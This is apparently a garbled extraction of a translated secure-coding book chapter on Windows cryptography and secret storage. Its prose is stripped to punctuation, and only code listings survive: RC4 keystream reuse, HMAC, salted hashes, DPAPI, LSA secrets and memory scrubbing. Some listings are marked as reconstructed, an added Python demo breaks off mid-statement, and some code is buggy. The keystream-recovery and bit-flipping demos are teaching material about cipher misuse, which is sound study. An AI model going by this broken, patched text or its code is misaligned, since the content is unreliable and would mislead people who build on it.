    if (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash))
        throw GetLastError();
    if (!CryptHashData(hHash, bKey, lstrlen(reinterpret_cast<char*>(bKey)), 0))
        throw GetLastError();
    if (!CryptDeriveKey(hProv, CALG_RC4, hHash, 0, &hKey))
        throw GetLastError();
    if (!CryptEncrypt(hKey, 0, TRUE, 0, bCipherText, &dwBuff, dwHowMuch))
        throw GetLastError();
    CryptDestroyKey(hKey);
    CryptDestroyHash(hHash);
    CryptReleaseContext(hProv, 0);
}

int main() {
    Setup();
    Encrypt(bKey, bPlainText1, bCipherText1, MAX_BLOB);
    Encrypt(bKey, bPlainText2, bCipherText2, MAX_BLOB);
    // Same key, same keystream: C1 XOR P1 reveals the keystream,
    // and keystream XOR C2 reveals the second plaintext without the key.
    for (int i = 0; i < MAX_BLOB; i++)
        bKeyStream[i] = bCipherText1[i] ^ bPlainText1[i];
    BYTE bRecovered[MAX_BLOB];
    for (int i = 0; i < MAX_BLOB; i++)
        bRecovered[i] = bCipherText2[i] ^ bKeyStream[i];
    printf("Recovered second message: %s\n", bRecovered);
    return 0;
}
.
. , E, T
A. , (
) . (, , .)
,
(DES 3DES).
. ,
( ) .
. ,
,
,
.
,
, :
, ! ,
,
.
(salt) , ,
.
.
UNIX
.
( /etc/passwd).
.
, ! Windows
, Windows 2000
,
. Windows NT 4.0 SP 3
Syskey ( ).
CryptoAPI,
.
;
, .
! .
,
,
.
,
.
, .
,
, .
,
, .
.NET Framework .
, ,
.
, , ,
XOR ,
. (bit
flip). 1
, , . ,
, .
, , :
16:00 03!Sep!2004. . .
, ,
.
,
3 2004 4 . , , ,
, .
( , )
, , .
( 16:00),
. !
( ).
. ,
, ,
. , .
, ,
, . 85.
, ,
,
. 85. ,
: ,
,
. ,
.
.
(keyed hash)
, .
.
, .
(message authentication code, MAC). Web
What are Message Authentication Codes (
) (http://www.rsasecurity.com/rsalabs/faq/217.html).
. 86 .
MAC
MAC
MAC-
. 86.
MAC-
, .
, ,
.
, ,
. .
!
. (1),
(2), 1,
, 2, . 1,
.
2 1
,
(, ). :
!
CryptoAPI, .NET Framework
. CryptoAPI,
HMAC (HashBased Message Authentication Code).
Secureco2\Chapter08\MAC. HMAC RFC 2104
(http://www.ietf.org/rfc/rfc2104.txt).
/*
  MAC.cpp
*/
#include "stdafx.h"
#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>

// Supplies the shared secret; assumed external helper, not on the page.
char *GetKeyFromUser();

// Computes an HMAC-SHA1 over pbData keyed with szKey. On success *pbHMAC points
// to a buffer of *pcbHMAC bytes that the caller frees with delete [].
// The start of this function is missing from the page; the CryptoAPI sequence
// before the surviving tail is reconstructed here and should be read as assumed.
DWORD HMACStuff(void *szKey, DWORD cbKey,
                void *pbData, DWORD cbData,
                LPBYTE *pbHMAC, PDWORD pcbHMAC) {
    DWORD dwErr = 0;
    HCRYPTPROV hProv = NULL;
    HCRYPTKEY  hKey = NULL;
    HCRYPTKEY  hKeyHash = NULL;
    HCRYPTHASH hHash = NULL;
    try {
        if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL,
                                 CRYPT_VERIFYCONTEXT))
            throw GetLastError();
        // Turn the secret into a CryptoAPI key object: hash it, then derive a key.
        if (!CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hKeyHash))
            throw GetLastError();
        if (!CryptHashData(hKeyHash, (LPBYTE)szKey, cbKey, 0))
            throw GetLastError();
        if (!CryptDeriveKey(hProv, CALG_RC4, hKeyHash, 0, &hKey))
            throw GetLastError();
        // Create the keyed-hash object and select SHA-1 as its inner hash.
        if (!CryptCreateHash(hProv, CALG_HMAC, hKey, 0, &hHash))
            throw GetLastError();
        HMAC_INFO hmacInfo;
        ZeroMemory(&hmacInfo, sizeof hmacInfo);
        hmacInfo.HashAlgid = CALG_SHA1;
        if (!CryptSetHashParam(hHash, HP_HMAC_INFO, (LPBYTE)&hmacInfo, 0))
            throw GetLastError();
        if (!CryptHashData(hHash, (LPBYTE)pbData, cbData, 0))
            throw GetLastError();
        // Query the HMAC size, allocate the buffer, and fetch the value.
        DWORD cbHMAC = 0;
        if (!CryptGetHashParam(hHash, HP_HASHVAL, NULL, &cbHMAC, 0))
            throw GetLastError();
        *pbHMAC = new BYTE[cbHMAC];
        if (NULL == *pbHMAC)
            throw (DWORD)ERROR_NOT_ENOUGH_MEMORY;
        if (!CryptGetHashParam(hHash, HP_HASHVAL, *pbHMAC, &cbHMAC, 0))
            throw GetLastError();
        *pcbHMAC = cbHMAC;
    } catch (DWORD e) {
        dwErr = e;
        printf("Error: %lu\n", dwErr);
    }
    if (hHash)    CryptDestroyHash(hHash);
    if (hKey)     CryptDestroyKey(hKey);
    if (hKeyHash) CryptDestroyHash(hKeyHash);   // a hash handle, so not CryptDestroyKey
    if (hProv)    CryptReleaseContext(hProv, 0);
    return dwErr;
}

int main() {
    // Key and data to protect.
    char *szKey = GetKeyFromUser();
    DWORD cbKey = lstrlen(szKey);
    if (cbKey == 0) {
        printf("Error: empty key.\n");
        return -1;
    }
    char *szData = "Constructed sample message...";
    DWORD cbData = lstrlen(szData);
    // HMACStuff allocates pbHMAC (cbHMAC bytes) for the result.
    LPBYTE pbHMAC = NULL;
    DWORD cbHMAC = 0;
    DWORD dwErr = HMACStuff(szKey, cbKey,
                            szData, cbData,
                            &pbHMAC, &cbHMAC);
    // Use the HMAC here, then free pbHMAC.
    delete [] pbHMAC;
    return dwErr ? -1 : 0;
}
.NET Framework , ,
, .
key () message ()
, hash HMAC.
! ,
.NET Framework. ,
.
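The two stream-cipher failure modes the chapter builds its listings around, keystream reuse (the RC4Test.cpp experiment) and bit flipping (the "03-Sep-2004 becomes 04-Sep-2004" scenario), together with the keyed-hash defence the MAC.cpp listing implements, as one added Python example. This is not code from the book: the RC4 routine is a small reference implementation written for the demo, the keys and messages are constructed values, and the MAC is HMAC-SHA256 from the standard library rather than the CryptoAPI HMAC-SHA1 the book uses.

```python
import hashlib
import hmac


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA, then PRGA).

    RC4 appears here only because it is the cipher the chapter's CryptoAPI
    listing derives; it is obsolete and not for new designs.
    """
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Stream cipher: output = data XOR keystream. Decryption is the same call."""
    return xor_bytes(data, rc4_keystream(key, len(data)))


def recover_from_reused_keystream(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Two messages under one key and keystream: C1 XOR C2 == P1 XOR P2.

    An observer who knows (or guesses) P1 therefore recovers P2 with no key.
    """
    n = min(len(c1), len(c2), len(known_p1))
    return xor_bytes(xor_bytes(c1[:n], c2[:n]), known_p1[:n])


def flip_ciphertext_bits(ciphertext: bytes, offset: int, mask: int) -> bytes:
    """Bit flipping: XORing a ciphertext byte XORs the same bits of the plaintext."""
    out = bytearray(ciphertext)
    out[offset] ^= mask
    return bytes(out)


def mac_tag(mac_key: bytes, ciphertext: bytes) -> bytes:
    """Keyed hash (HMAC-SHA256) over the ciphertext: encrypt-then-MAC."""
    return hmac.new(mac_key, ciphertext, hashlib.sha256).digest()


def verify_then_decrypt(enc_key: bytes, mac_key: bytes, ciphertext: bytes, tag: bytes):
    """Return the plaintext only if the tag verifies; None if anything was altered."""
    if not hmac.compare_digest(mac_tag(mac_key, ciphertext), tag):
        return None
    return rc4_cr
yp_t = None  # placeholder never used; see line below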
MAC,
:
. MAC
;
MAC ;
(nonrepu
diation) ( ). MAC
,
MAC;
, MAC ( ).
,
, , MAC.
. 87.
. 87.
, ,
( ,
, , !).
.
254
II
CAPICOM
. VBScript ,
:
!
MAC .
, .
. .
, ,
, . (
,
.) :
, , !
:
255
1. ;
2. ;
3. .
. ,
:
1. ;
2. ;
3. .
!
IIS 4. , SSL
,
.
: (, , )
. , , .
, . Web
http://www.microsoft.com/technet/security/bulletin/MS99053.asp.
, ,
, .
, , ,
, ,
. :
, ,
. . 83 , , ,
.
256
II
8-3.
RC2, RC4, DES, 3DES, AES
( Rijndael)
SHA1, SHA256, SHA384, SHA512,
MD4, MD5, HMAC,
, RSA DSS, XML DSig
MAC
. ,
, . ,
, ,
,
.
, ,
: MD4 MD5.
? . ,
. , MD4 MD5
, . ,
, .
,
,
.
,
API
. .
. ,
? ,
, .
, ,
, . ,
,
.
, .
, ,
. ,
,
. : , ,
( ) ,
,
Microsoft Windows, ,
,
, ,
.
,
(persistent) . (ephemeral) ,
, .
SSL/TLS, IPSec, RPC DCOM
. .
! .
,
. : ,
, .
258
II
, :
( ) .
, . , ,
Blake, Blake.
, (spoofing) .
,
, ,
.
, , .
, ?
? ? ,
.
, , ,
. (, , ?) ,
,
, .
.
() .
,
, . .
Windows NT
, Debug programs (
). Microsoft Platform SDK
SeDebugPrivilege SE_DEBUG_NAME.
, .
.
. Pagefile.sys,
.
: Hiberfil.sys,
, .
, ,
, (, Dr. Wat
son) . ,
.
: ,
, , .
, , , ,
.
,
( ), ,
(verifier),
259
. ,
,
, , , .
, .
,
( ) .
(hash function), (digest function),
,
. ,
, .
128 160 , . ,
RSA Data Security Inc. MD5
128 , SHA1 [
(National Institute of Standards and Technology, NIST)
(National Security Agency, NSA)]
160 . ( SHA1.
NIST SHA1: SHA256, SHA384
SHA512. Microsoft CryptoAPI MD4, MD5 SHA1, .NET
Framework MD5, SHA1, SHA256, SHA384 SHA512. (
SHA Web csrc.nc
sl.nist.gov/cryptval/shs.html.)
,
,
.
( .
, ,
.) ,
, .
, .
(salt) ,
,
. (dictionary attack)
, ,
, .
,
(
8).
CryptoAPI . C/C++:
260
II
// .
if (!CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash))
throw GetLastError();
if (!CryptHashData(hHash, (LPBYTE)bSecret, cbSecret, 0))
throw GetLastError();
if (!CryptHashData(hHash, (LPBYTE)bSalt, cbSalt, 0))
throw GetLastError();
// .
DWORD cbSaltedHash = 0;
DWORD cbSaltedHashLen = sizeof (DWORD);
if (!CryptGetHashParam(hHash, HP_HASHSIZE, (BYTE*)&cbSaltedHash,
&cbSaltedHashLen, 0))
throw GetLastError();
// .
BYTE *pbSaltedHash = new BYTE[cbSaltedHash];
if (NULL == *pbSaltedHash) throw;
if(!CryptGetHashParam(hHash, HP_HASHVAL, pbSaltedHash,
&cbSaltedHash, 0))
throw GetLastError();
, C#:
using System;
using System.Security.Cryptography;
using System.IO;
using System.Text;
...
static byte[] HashPwd(byte[] pwd, byte[] salt) {
SHA1 sha1 = SHA1.Create();
UTF8Encoding utf8 = new UTF8Encoding();
CryptoStream cs =
new CryptoStream(Stream.Null, sha1, CryptoStreamMode.Write);
cs.Write(pwd,0,pwd.Length);
cs.Write(salt,0,salt.Length);
cs.FlushFinalBlock();
return sha1.Hash;
}
Secureco2\Chapter09\Sal
tedHash. , , :
, ,
. CryptGetHashParam
Windows API
, , .
, .
, ,
(). ,
, .
261
.
.
PKCS #5
,
.
PKCS #5 (PublicKey Cryptography Standard).
, RSA Data Security
, Microsoft, Apple Sun Microsystems. PKCS #5
RFC 2898 (http://www.ietf.org/rfc/rfc2898.txt).
PKCS#5
. , , PBKDF1 (Password
Based Key Derivation Function #1) PKCS #5.
, PBKDF2, :
. , PKCS #5,
PBKDF1.
PKCS #5 ,
.
,
.
, , ,
PKCS #5.
,
.
1. .
2. .
3. .
4. .
5. PKCS #5.
, 64 , ,
, 264 ( 263,
, ,
). , .
,
PKCS #5. ,
PKCS #5 .
,
, .
C#
:
262
II
: CryptoAPI Windows
PKCS #5, CryptDeriveKey,
.
,
.
! :
! , PKCS #5
, ,
.
.
,
. ? , ,
.
, ,
.
, .
, ,
,
.
. ,
, (
) ,
.
,
.
Windows 2000
Windows 2000
CryptProtectData CryptUnprotectData API DPAPI (Data Protection
API). DPAPI :
. CRYPTPROTECT_LO
CAL_MACHINE dwFlags,
ACL , , ,
DPAPI. ,
Accounting (), ACL
:
263
DPAPI
. DPAPI
, ?
. . CryptProtectData CRYPTPROTECT_LO
CAL_MACHINE ,
. ,
, CryptProtectData.
,
(ACL),
pOptionalEntropy.
DPAPI
. ( )
, ?
.
, ,
, .
CryptProtecData pOptionalEntropy
, ,
.
, CryptUnprotectData
, !
264
II
( 16 ),
/
.
! CRYPTPROTECT_LOCAL_MA
CHINE, .
,
,
.
, ,
SYSTEM, Windows 2000/XP LsaStore
PrivateData LsaRetrievePrivateData API
LSA.
, LSA 4096 ,
(2048) . ,
. DPAPI. LSA
Windows NT 4.
,
DPAPI ( Secureco2\Chap
ter09\DPAPI).
// .
DATA_BLOB blobIn;
blobIn.pbData = reinterpret_cast<BYTE *>("This is my secret data.";
blobIn.cbData = lstrlen(reinterpret_cast<char *>(blobIn.pbData))+1;
// .
DATA_BLOB blobEntropy;
blobEntropy.pbData = GetEntropyFromUser();
blobEntropy.cbData = lstrlen(
reinterpret_cast<char *>(blobEntropy.pbData));
// .
DATA_BLOB blobOut;
DWORD dwFlags = CRYPTPROTECT_AUDIT;
if(CryptProtectData(
&blobIn,
L"Writing Secure Code Example",
&blobEntropy,
NULL,
NULL,
dwFlags,
&blobOut))
{
printf(" .\n");
} else {
printf(" CryptProtectData() !> %x",
GetLastError());
265
exit(!1);
}
// .
DATA_BLOB blobVerify;
if (CryptUnprotectData(
&blobOut,
NULL,
&blobEntropy,
NULL,
NULL,
0,
&blobVerify)) {
printf(" : %s\n", blobVerify .pbData);
} else {
printf(" CryptUnprotectData() ! > %x",
GetLastError());
exit(!1);
}
LocalFree(blobOut.pbData);
LocalFree(blobVerify.pbData);
DPAPI Web
http://msdn.microsoft.com/library/enus/dnsecure/html/windatapro
tectiondpapi.asp.
: Windows XP
Windows XP Stored User Names and Passwords (
),
(
) .
, ,
. :
,
;
DPAPI;
,
.
Stored User Names and Passwords :
Windows .
, Kerberos.
SSPI (Security Support Provider Interface).
, ,
266
II
,
SQL.
(. Secureco2\Chapter09\Cred) ,
.
/*
Cred.cpp
*/
#include <stdio.h>
#include <windows.h>
#include <wincred.h>
CREDUI_INFO cui;
cui.cbSize = sizeof CREDUI_INFO;
cui.hwndParent = NULL;
cui.pszMessageText =
TEXT(",
Northwind Traders Accounts.");
cui.pszCaptionText = TEXT("Northwind Traders Accounts") ;
cui.hbmBanner = NULL;
PCTSTR pszTargetName = TEXT("NorthwindAccountsServer");
DWORD dwErrReason = 0;
Char pszName[CREDUI_MAX_USERNAME_LENGTH+1];
Char pszPwd[CREDUI_MAX_PASSWORD_LENGTH+1];
DWORD dwName = CREDUI_MAX_USERNAME_LENGTH;
DWORD dwPwd = CREDUI_MAX_PASSWORD_LENGTH;
BOOL fSave = FALSE;
DWORD dwFlags =
CREDUI_FLAGS_GENERIC_CREDENTIALS |
CREDUI_FLAGS_ALWAYS_SHOW_UI;
// .
ZeroMemory(pszName, dwName);
ZeroMemory(pszPwd, dwPwd);
DWORD err = CredUIPromptForCredentials(
&cui,
pszTargetName,
NULL,
dwErrReason,
pszName,dwName,
pszPwd,dwPwd,
&fSave,
dwFlags);
if (err)
printf(" CredUIPromptForCredentials() !> %d",
GetLastError());
267
else {
// Northwind Traders Accounting
// pszName pszPwd .
}
, . 91. :
,
( NorthwindAccountsServer) DPAPI.
Windows NT 4
Windows NT 4 DPAPI, CryptoAPI ACL.
.
1. CryptGenRandom .
2. .
3. ACL Creator/Owner Admi
nistrators.
4. ,
ACE (SACL), .
. ,
268
II
. ,
, .
, LSA (
LsaStorePrivateData LsaRetrievePrivateData). LSA
: , , .
( ),
. .
LSA L$. LSA,
,
. LSA G$.
LSA
, M$. (private) LSA,
, .
,
. ,
SC_. ,
, LsaStorePrivateData
MSDN.
LSA DPAPI
, :
LSA 4096 , DPAPI
;
LSA ,
DPAPI ;
DPAPI , LSA
;
LSA , DPAPI
, , ;
LSA,
. DPAPI
, ACL,
.
LSA,
LSA. C++,
:
// LSASecrets.cpp : .
#include <windows.h>
#include <stdio.h>
#include "ntsecapi.h"
bool InitUnicodeString(LSA_UNICODE_STRING* pUs, const WCHAR* input){
DWORD len = 0;
if(!pUs)
269
return false;
if(input){
len = wcslen(input);
if(len > 0x7ffe) // 32k, FALSE;
}
pUs!>Buffer = (WCHAR*)input;
pUs!>Length = (USHORT)len * sizeof(WCHAR);
pUs!>MaximumLength = (USHORT)(len + 1) * sizeof(WCHAR);
return true;
}
LSA_HANDLE GetLSAPolicyHandle(WCHAR *wszSystemName) {
LSA_OBJECT_ATTRIBUTES ObjectAttributes;
ZeroMemory(&ObjectAttributes, sizeof(ObjectAttributes));
LSA_UNICODE_STRING lusSystemName;
if(!InitUnicodeString(&lusSystemName, wszSystemName))return NULL;
LSA_HANDLE hLSAPolicy = NULL;
NTSTATUS ntsResult = LsaOpenPolicy(&lusSystemName,&ObjectAttributes,
POLICY_ALL_ACCESS,
&hLSAPolicy);
DWORD dwStatus = LsaNtStatusToWinError(ntsResult);
if (dwStatus != ERROR_SUCCESS) {
wprintf(L"OpenPolicy returned %lu\n",dwStatus);
return NULL;
}
return hLSAPolicy;
}
(. Secureco2\Chapter09\LSASecrets) ,
LSA :
270
II
{
LSA_UNICODE_STRING lucName;
if(!InitUnicodeString(&lucName, wszName))
return ERROR_INVALID_PARAMETER;
PLSA_UNICODE_STRING plucSecret = NULL;
NTSTATUS ntsResult = LsaRetrievePrivateData(hLSA,
&lucName, &plucSecret);
DWORD dwStatus = LsaNtStatusToWinError(ntsResult);
if (dwStatus != ERROR_SUCCESS)
wprintf(L" %lu\n",dwStatus);
else
wcsncpy(wszSecret, plucSecret!>Buffer,
min((plucSecret!>Length)/sizeof WCHAR,dwBuffLen));
if (plucSecret)
LsaFreeMemory(plucSecret);
return dwStatus;
}
int main(int argc, char* argv[]) {
LSA_HANDLE hLSA = GetLSAPolicyHandle(NULL);
WCHAR *wszName = L"L$WritingSecureCode";
WCHAR *wszSecret = L"My Secret Data!";
if (WriteLsaSecret(hLSA, wszSecret, wszName) == ERROR_SUCCESS) {
WCHAR wszSecretRead[128];
if (ReadLsaSecret(hLSA,sizeof wszSecretRead / sizeof WCHAR,
wszSecretRead,wszName) == ERROR_SUCCESS)
wprintf(L" LSA '%s' '%s'\n",wszName,wszSecretRead);
}
if (hLSA) LsaClose(hLSA);
return 0;
}
LSA, LsaStorePrivateData NULL.
, LSA,
, LSADUMP2.exe,
BindView (http://razor.bindview.com/tools/desc/lsadump2_
readme.html). ,
!
Windows 95/98/Me
Windows CE
Windows 95/98/Me Windows CE (
) CryptoAPI, ACL.
, ,
, ? ?
271
ACL? .
.
, , Windows NT 4 Windows 2000/XP.
, ( )
Windows 95/98/Me Windows CE ,
.
Crypt
GenRandom, ,
, , , ,
.. ,
.
, ,
, .
,
. :
.
, ,
.
HKEY_LOCAL_MACHINE\HARDWARE Windows 95/98/Me
, .
, , . ,
.
PnP
Plug and Play Windows 98, Windows 2000
. ,
,
. , :
,
SHA1,
. Web
http://msdn.microsoft.com/library/enus/devio/deviceman_7u9f.asp.
#include "windows.h"
#include "wincrypt.h"
#include "initguid.h"
#include "Setupapi.h"
#include "winioctl.h"
#include "strsafe.h"
// (DDK),
// !
DEFINE_GUID( GUID_DEVCLASS_CDROM,
\
0x4d36e965L, 0xe325, 0x11ce, 0xbf, 0xc1,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18 );
DEFINE_GUID( GUID_DEVCLASS_NET, \
0x4d36e972L, 0xe325, 0x11ce, 0xbf, 0xc1,
272
II
);
0xc1,
);
0xc1,
);
0xc1,
);
0xc1,
);
0x56,
);
0xc1,
);
0xc1,
);
0xcc,
);
if (SetupDiGetDeviceRegistryProperty(hDevInfo,
&did,
SPDRP_HARDWAREID,
&dwRegType,
(PBYTE)Buff,
cBuff,
&cNeeded))
// , .
if (cData > cNeeded) {
StringCchCat(szData,cData,"\n\t");
StringCchCat(szData,cData,Buff);
}
}
return 0;
}
DWORD CreateHashFromPnPStuff(HCRYPTHASH hHash) {
struct {
LPGUID guid;
_TCHAR *szDevice;
} device [] =
{
{(LPGUID)&GUID_DEVCLASS_CDROM, "CD"},
{(LPGUID)&GUID_DEVCLASS_DISPLAY, "VDU"},
{(LPGUID)&GUID_DEVCLASS_NET, "NET"},
{(LPGUID)&GUID_DEVCLASS_KEYBOARD, "KBD"},
{(LPGUID)&GUID_DEVCLASS_MOUSE, "MOU"},
{(LPGUID)&GUID_DEVCLASS_USB, "USB"},
{(LPGUID)&GUID_DEVCLASS_PROCESSOR,"CPU"}
};
const DWORD cData = 4096;
TCHAR *pData = new TCHAR[cData];
if (!pData)
return ERROR_NOT_ENOUGH_MEMORY;
DWORD dwErr = 0;
for (int i=0; i < sizeof(device)/sizeof(device[0]); i++) {
ZeroMemory(pData,cData);
if (GetPnPStuff(device[i].guid,pData,cData) == 0) {
#ifdef _DEBUG
printf("%s: %s\n",device[i].szDevice, pData);
#endif
if (!CryptHashData(hHash,
(LPBYTE)pData, lstrlen(pData), 0)) {
dwErr = GetLastError();
273
274
II
break;
}
} else {
dwErr = GetLastError();
}
}
delete [] pData;
return dwErr;
}
int _tmain(int argc, _TCHAR* argv[]) {
HCRYPTPROV hProv = NULL;
HCRYPTHASH hHash = NULL;
if (CryptAcquireContext
(&hProv,NULL,NULL,PROV_RSA_FULL,CRYPT_VERIFYCONTEXT)) {
if (CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash)) {
if (CreateHashFromPnPStuff(hHash) == 0) {
// .
BYTE hash[20];
DWORD cbHash = 20;
if (CryptGetHashParam
(hHash,HP_HASHVAL,hash,&cbHash,0)) {
for (DWORD i=0; i < cbHash; i++) {
printf("%02X",hash[i]);
}
}
}
}
}
if (hHash)
CryptDestroyHash(hHash);
if (hProv)
CryptReleaseContext(hProv, 0);
}
if (hHash)
CryptDestroyHash(hHash);
if (hProv)
CryptReleaseContext(hProv, 0);
}
275
. ,
, .
!
,
,
. :
.
,
,
.
, Windows
.
ACL,
. ,
Windows NT 4 ,
?
, Windows NT 4, Windows 2000
API .
, ,
, ,
,
. , Win
dows NT, Windows 2000 , Win
dows 2000 DPAPI, Windows NT 4 LSA.
// CryptProtectData.
typedef BOOL (WINAPI CALLBACK* CPD)
(DATA_BLOB*,LPCWSTR,DATA_BLOB*,
PVOID,CRYPTPROTECT_PROMPTSTRUCT*,DWORD,DATA_BLOB*);
// CryptUnprotectData.
typedef BOOL (WINAPI CALLBACK* CUD)
(DATA_BLOB*,LPWSTR,DATA_BLOB*,
PVOID,CRYPTPROTECT_PROMPTSTRUCT*,DWORD,DATA_BLOB*);
HRESULT EncryptData(LPCTSTR szPlaintext) {
HRESULT hr = S_OK;
HMODULE hMod = LoadLibrary(_T("crypt32.dll"));
if (!hMod)
return HRESULT_FROM_WIN32(GetLastError());
CPD cpd = (CPD)GetProcAddress(hMod,_T("CryptProtectData"));
276
II
if (cpd) {
// DPAPI cpd ;
// ,
// ACL.
} else {
// API! LSA.
}
FreeLibrary(hMod);
return hr;
}
:
;
;
;
.
,
. ,
. , , ,
, ,
. ,
.
,
( ) memset ZeroMemory,
memset:
void *p = malloc(N);
...
size_t cb = _msize(p);
memset(p,0,cb);
277
...
C C++
. ,
, ..
(dead code). , ,
, ,
, . :
; 30
; 31
; 32
:
:
push
mov
lea
push
call
add
test
je
; 33
278
II
mov
lea
push
push
call
add
$L1344:
;
;
;
;
;
;
;
34
35
36
37
38
39
40
:
// , .
:
// .
:
}
:
}
:
:
ZeroMemory(szPwd,sizeof(szPwd));
: }
mov
ecx, DWORD PTR __$ArrayPad$[esp+68]
xor
ecx, DWORD PTR __$ReturnAddr$[esp+64]
add
esp, 68; 00000044H
jmp
@__security_check_cookie@4
DatabaseConnect ENDP
30
/GS, cookie (stackbased
cookie). ( 5.) 3440
, 30 cookie
. ?
_memset. ( , ZeroMemory ,
memset.)
,
. ,
if ,
.
,
. ,
, (
)
. ,
,
(control flow graph),
. ,
.
(dead store elimination).
, ,
(AS IF rule), .
279
, , ,
.
,
,
.
, .
Visual C++ ,
, .
, ,
, , , szPwd
, .
Microsoft Visual C++ 6 7, GNU C (GCC) 3.x.
,
. Windows Security Push (. 2)
(inline) ZeroMemory SecureZeroMemory,
. (
winbase.h):
#ifndef FORCEINLINE
#if (MSC_VER >= 1200)
#define FORCEINLINE __forceinline
#else
#define FORCEINLINE __inline
#endif
#endif
...
FORCEINLINE PVOID SecureZeroMemory(
void *ptr, size_t cnt) {
volatile char *vptr = (volatile char *)ptr;
while (cnt) {
*vptr = 0;
vptr++;
cnt!!;
}
return ptr;
}
,
Windows. :
ZeroMemory memset
.
,
!
memset
. ,
, . ,
280
II
volatile,
.
, ZeroMemory :
#pragma optimize("",off)
// .
#pragma optimize("",on)
.
Og ( Ox,
O1 O2) Visual C++ .
, #pragma.
, , ,
.
.
CryptoAPI.
.
Windows .NET Server 2003 API, CryptProtect
Memory CryptUnprotectMemory; DPAPI,
.
,
, . ,
. .
#include <wincrypt.h>
#define SECRET_LEN 15 // null.
HRESULT hr = S_OK;
LPWSTR pSensitiveText = NULL;
DWORD cbSensitiveText = 0;
DWORD cbPlainText = SECRET_LEN * sizeof(WCHAR);
DWORD dwMod = 0;
281
//
// CYPTPROTECTMEMORY_BLOCK_SIZE.
if (dwMod = cbPlainText % CRYPTPROTECTMEMORY_BLOCK_SIZE)
cbSensitiveText = cbPlainText + (CRYPTPROTECTMEMORY_BLOCK_SIZE ! dwMod);
else
cbSensitiveText = cbPlainText;
pSensitiveText = (LPWSTR)LocalAlloc(LPTR, cbSensitiveText);
if (NULL == pSensitiveText)
return E_OUTOFMEMORY;
// pSensitiveText,
// .
if (!CryptProtectMemory(pSensitiveText,
cbSensitiveText,
CRYPTPROTECTMEMORY_SAME_PROCESS)) {
// .
SecureZeroMemory(pSensitiveText, cbSensitiveText);
LocalFree(pSensitiveText);
pSensitiveText = NULL;
return GetLastError();
}
// CryptUnprotectMemory .
...
// .
SecureZeroMemory(pSensitiveText, cbSensitiveText);
LocalFree(pSensitiveText);
pSensitiveText = NULL;
return hr;
Platform SDK.
,
.
, .
( , AllocateUserPhysicalPages VirtualLock)
.
,
, (hibernate
mode) , ,
.
282
II
VirtualLock
API VirtualLock Windows NT 4
.
.
( , ,
, ),
.
, .
.
,
.
, , ! , ,
, ,
.
,
.
.
( ,
). , :
,
;
,
, ,
. :
, , ,
, .
(common language runtime, CLR) .NET .NET
Framework
, XML
! .NET
XCOPY,
. DLL
,
! ,
,
283
, .
.
, . ,
XCOPY , ,
, .
, ,
.
// DataProtection.cs
namespace Microsoft.Samples.DPAPI {
    using System;
    using System.Runtime.InteropServices;
    using System.Text;

    public class DataProtection {
        // Encrypts a string with DPAPI and returns the
        // result as a Base-64 string.
        public static string ProtectData(string data,
                                         string name,
                                         int flags) {
            byte[] dataIn = Encoding.Unicode.GetBytes(data);
            byte[] dataOut = ProtectData(dataIn, name, flags);
            return (null != dataOut)
                ? Convert.ToBase64String(dataOut)
                : null;
        }

        // Decodes a Base-64 string and decrypts it with DPAPI.
        public static string UnprotectData(string data) {
            byte[] dataIn = Convert.FromBase64String(data);
            byte[] dataOut = UnprotectData(dataIn,
                                           NativeMethods.UIForbidden |
                                           NativeMethods.VerifyProtection);
            return (null != dataOut)
                ? Encoding.Unicode.GetString(dataOut)
                : null;
        }

        ////////////////////////
        // Internal functions //
        ////////////////////////
        internal static byte[] ProtectData(byte[] data,
                                           string name,
                                           int dwFlags) {
            byte[] cipherText = null;

            // Copy the data into unmanaged memory.
            NativeMethods.DATA_BLOB din =
                new NativeMethods.DATA_BLOB();
            din.cbData = data.Length;
            din.pbData = Marshal.AllocHGlobal(din.cbData);
            Marshal.Copy(data, 0, din.pbData, din.cbData);

            NativeMethods.DATA_BLOB dout =
                new NativeMethods.DATA_BLOB();

            NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps =
                new NativeMethods.CRYPTPROTECT_PROMPTSTRUCT();

            // Fill in the DPAPI prompt structure.
            InitPromptstruct(ref ps);

            try {
                bool ret =
                    NativeMethods.CryptProtectData(
                        ref din,
                        name,
                        NativeMethods.NullPtr,
                        NativeMethods.NullPtr,
                        ref ps,
                        dwFlags, ref dout);
                if (ret) {
                    cipherText = new byte[dout.cbData];
                    Marshal.Copy(dout.pbData,
                                 cipherText, 0, dout.cbData);
                    NativeMethods.LocalFree(dout.pbData);
                } else {
#if (DEBUG)
                    Console.WriteLine("Encryption failed: " +
                        Marshal.GetLastWin32Error().ToString());
#endif
                }
            }
            finally {
                if ( din.pbData != IntPtr.Zero )
                    Marshal.FreeHGlobal(din.pbData);
            }
            return cipherText;
        }

        internal static byte[] UnprotectData(byte[] data,
                                             int dwFlags) {
            byte[] clearText = null;

            // Copy the data into unmanaged memory.
            NativeMethods.DATA_BLOB din =
                new NativeMethods.DATA_BLOB();
            din.cbData = data.Length;
            din.pbData = Marshal.AllocHGlobal(din.cbData);
            Marshal.Copy(data, 0, din.pbData, din.cbData);

            NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps =
                new NativeMethods.CRYPTPROTECT_PROMPTSTRUCT();
            InitPromptstruct(ref ps);

            NativeMethods.DATA_BLOB dout =
                new NativeMethods.DATA_BLOB();

            try {
                bool ret =
                    NativeMethods.CryptUnprotectData(
                        ref din,
                        null,
